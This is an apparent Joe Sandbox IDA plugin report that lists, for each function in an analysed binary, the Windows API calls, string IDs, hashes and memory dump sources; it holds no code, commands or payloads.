                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                                                                                                                                                                                                                      • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                      • API String ID: 1652260434-3619404913
                                                                                                                                                                                                                                      • Opcode ID: 8f8036b48c1056f2e6ba4517c353fc111f8dc8587eb4e8fd9bc740170673efb4
                                                                                                                                                                                                                                      • Instruction ID: 67dce5d3b99361f8a27d8724fba7db8582b49dd0596a6ca5619650aa2cf33394
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f8036b48c1056f2e6ba4517c353fc111f8dc8587eb4e8fd9bc740170673efb4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B717E70148248AFD721DF19CC44F7ABBEAFB89304F04581EFA99A72A1C770E909DB11
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00EF9968
                                                                                                                                                                                                                                        • Part of subcall function 00EF7E74: ClientToScreen.USER32(?,?), ref: 00EF7E9A
                                                                                                                                                                                                                                        • Part of subcall function 00EF7E74: GetWindowRect.USER32(?,?), ref: 00EF7F10
                                                                                                                                                                                                                                        • Part of subcall function 00EF7E74: PtInRect.USER32(?,?,00EF93AA), ref: 00EF7F20
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EF99D1
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00EF99DC
                                                                                                                                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00EF99FF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00EF9A46
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00EF9A5F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EF9A76
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00EF9A98
                                                                                                                                                                                                                                      • DragFinish.SHELL32(?), ref: 00EF9A9F
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00EF9B92
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                                                                                      • API String ID: 221274066-3440237614
                                                                                                                                                                                                                                      • Opcode ID: c88993effe648a11251672107d929747690af064f31e6753a5010e46dbb8c5e1
                                                                                                                                                                                                                                      • Instruction ID: c98004282b52887ef842eb63d2546cdffeac7fcdd4cd3ffb754641b5deb43331
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c88993effe648a11251672107d929747690af064f31e6753a5010e46dbb8c5e1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC618B71508305AFC701EF61DC85EAFBBE9EFC9350F00191EF691A61A1DB709A49CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EDCD00
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EDCD13
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EDCD27
                                                                                                                                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EDCD40
                                                                                                                                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00EDCD83
                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EDCD99
                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EDCDA4
                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EDCDD4
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00EDCE2C
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00EDCE40
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00EDCE4B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 611ef66f0f55883780581b000f2f5bc4b4c0eb512ecd94644668643cb8abd3a0
                                                                                                                                                                                                                                      • Instruction ID: 2c4172520f184e9977511cccd641385be89bfc3475ef9403aa39252b1966952e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 611ef66f0f55883780581b000f2f5bc4b4c0eb512ecd94644668643cb8abd3a0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 515170B0504209BFDB219F61CD88ABB7BFDFF48788F10541AF945A6250D734D909EBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EF649E,?,?), ref: 00EF8DB3
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EF649E,?,?,00000000,?), ref: 00EF8DC3
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EF649E,?,?,00000000,?), ref: 00EF8DCE
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00EF649E,?,?,00000000,?), ref: 00EF8DDB
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000,?,?,?,?,00EF649E,?,?,00000000,?), ref: 00EF8DE9
                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EF649E,?,?,00000000,?), ref: 00EF8DF8
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00EF649E,?,?,00000000,?), ref: 00EF8E01
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00EF649E,?,?,00000000,?), ref: 00EF8E08
                                                                                                                                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EF649E,?,?,00000000,?), ref: 00EF8E19
                                                                                                                                                                                                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F00C20,?), ref: 00EF8E32
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00EF8E42
                                                                                                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00EF8E62
                                                                                                                                                                                                                                      • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00EF8E92
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EF8EBA
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EF8ED0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3840717409-0
                                                                                                                                                                                                                                      • Opcode ID: 3d80f04858248d48f3aee6ffa8db9217bc4e069ea3f3cf411962f993a6cd77b6
                                                                                                                                                                                                                                      • Instruction ID: ce83b25c2f6f5e1c2045cb7daa4b9c7847d2ed814206c9293fd70ebf21e19570
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d80f04858248d48f3aee6ffa8db9217bc4e069ea3f3cf411962f993a6cd77b6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B412875600208AFDB119F66DD88EBEBBBDFF89715F104058F905E72A0DB30A905DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00ED1CCC
                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00ED1CD5
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00ED1CE1
                                                                                                                                                                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00ED1DC5
                                                                                                                                                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00ED1E21
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00ED1ED2
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00ED1F56
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00ED1FA2
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00ED1FB1
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00ED1FED
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                                                                                                                                      • API String ID: 1234038744-3931177956
                                                                                                                                                                                                                                      • Opcode ID: 35ddafb4a8aebfbe37a1716170fe5753922dc4a58223e23e56f4e89423144991
                                                                                                                                                                                                                                      • Instruction ID: 9a861cf8f37becc829313def016c412c943a4a55b9b54cbcb417df02eb871f0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35ddafb4a8aebfbe37a1716170fe5753922dc4a58223e23e56f4e89423144991
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5ED12371A04205EFCB149FA5D884BB9BBF5FF04701F20949BE859BB281EB30AC46DB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EED1F1: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EEBF07,?,?), ref: 00EED20E
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EEBF4D
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EEBFCB
                                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00EEC063
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00EEC0D7
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00EEC0F5
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00EEC14B
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EEC15D
                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EEC17B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00EEC1DC
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EEC1ED
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 1742008743-4033151799
                                                                                                                                                                                                                                      • Opcode ID: a009a1547da99f5042635e208dc0fbfe7c9ba097d0c339884a468d405669949d
                                                                                                                                                                                                                                      • Instruction ID: c5e02e911f43df1b225d1ca944a74096e582a18c43f833e994ddaa7099f5ec00
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a009a1547da99f5042635e208dc0fbfe7c9ba097d0c339884a468d405669949d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44C17E31209241EFD710DF15C895F2ABBE1BF84348F24949CF496AB6A2CB71ED46CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EE2E31
                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00EE2E41
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00EE2E4D
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00EE2E5A
                                                                                                                                                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00EE2EC6
                                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00EE2F05
                                                                                                                                                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00EE2F29
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00EE2F31
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00EE2F3A
                                                                                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 00EE2F41
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00EE2F4C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                      • String ID: (
                                                                                                                                                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                      • Opcode ID: 166331df18508ed6ed91c96e8b586a3ea93c28505cf6adc0c8e1e7f640db1c3a
                                                                                                                                                                                                                                      • Instruction ID: 3941d9c2498324c0a2a51ebec502877cca41cb09e1f345ef7b132e28004d8ede
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 166331df18508ed6ed91c96e8b586a3ea93c28505cf6adc0c8e1e7f640db1c3a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D61D2B5D04219AFCB15CFA5DC84AAEBBFAFF48310F208519E659B7250D770A941CF50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EEBF07,?,?), ref: 00EED20E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                      • API String ID: 3964851224-909552448
                                                                                                                                                                                                                                      • Opcode ID: 32b56b712e47e40b7eaa6d6a4eef8346635b1a1f0437f2d66917d20d308c4fcd
                                                                                                                                                                                                                                      • Instruction ID: 19bb3727ca90793ae8ceff29aefb53eaae9539034933c7b9471c8220d4ab292a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32b56b712e47e40b7eaa6d6a4eef8346635b1a1f0437f2d66917d20d308c4fcd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B77117726081AE8BCB109E7ADD406FF33A1AF74358B202129FC65BB2D5EA30DD45C361
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E79DA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E79DB2
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EF957B
                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00EF958B
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00EF9596
                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00EF963E
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EF96F0
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00EF970D
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00EF971D
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EF974F
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EF9791
                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EF97C2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 0fe92e1004a4c7e7be4f625f102089d5775073b9832699b0eebff4bfd537884f
                                                                                                                                                                                                                                      • Instruction ID: 634eeb61c240cff1548295b77afcb46c16b3b9c5ea731332204af1b009217bcc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fe92e1004a4c7e7be4f625f102089d5775073b9832699b0eebff4bfd537884f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D819D715083099FD710DF25C884BBB7BE9BB88318F05551AFA89F7292D730D905CBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00F32990,000000FF,00000000,00000030), ref: 00ECC662
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(00F32990,00000004,00000000,00000030), ref: 00ECC697
                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 00ECC6A9
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00ECC6EF
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00ECC70C
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00ECC738
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00ECC77F
                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ECC7C5
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ECC7DA
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ECC7FB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 999f367e89d1cbc5ec376497f973e6925774a49fc72f9b619f27407fbb845f15
                                                                                                                                                                                                                                      • Instruction ID: 204a9189092529abba5f4e8c4026521c7ed4138902474c6b1e6d248e62262b5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 999f367e89d1cbc5ec376497f973e6925774a49fc72f9b619f27407fbb845f15
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D961A071904249AFDB15CF64CE88FFEBBA9FB45308F205019E819B3251D732AD16DB60
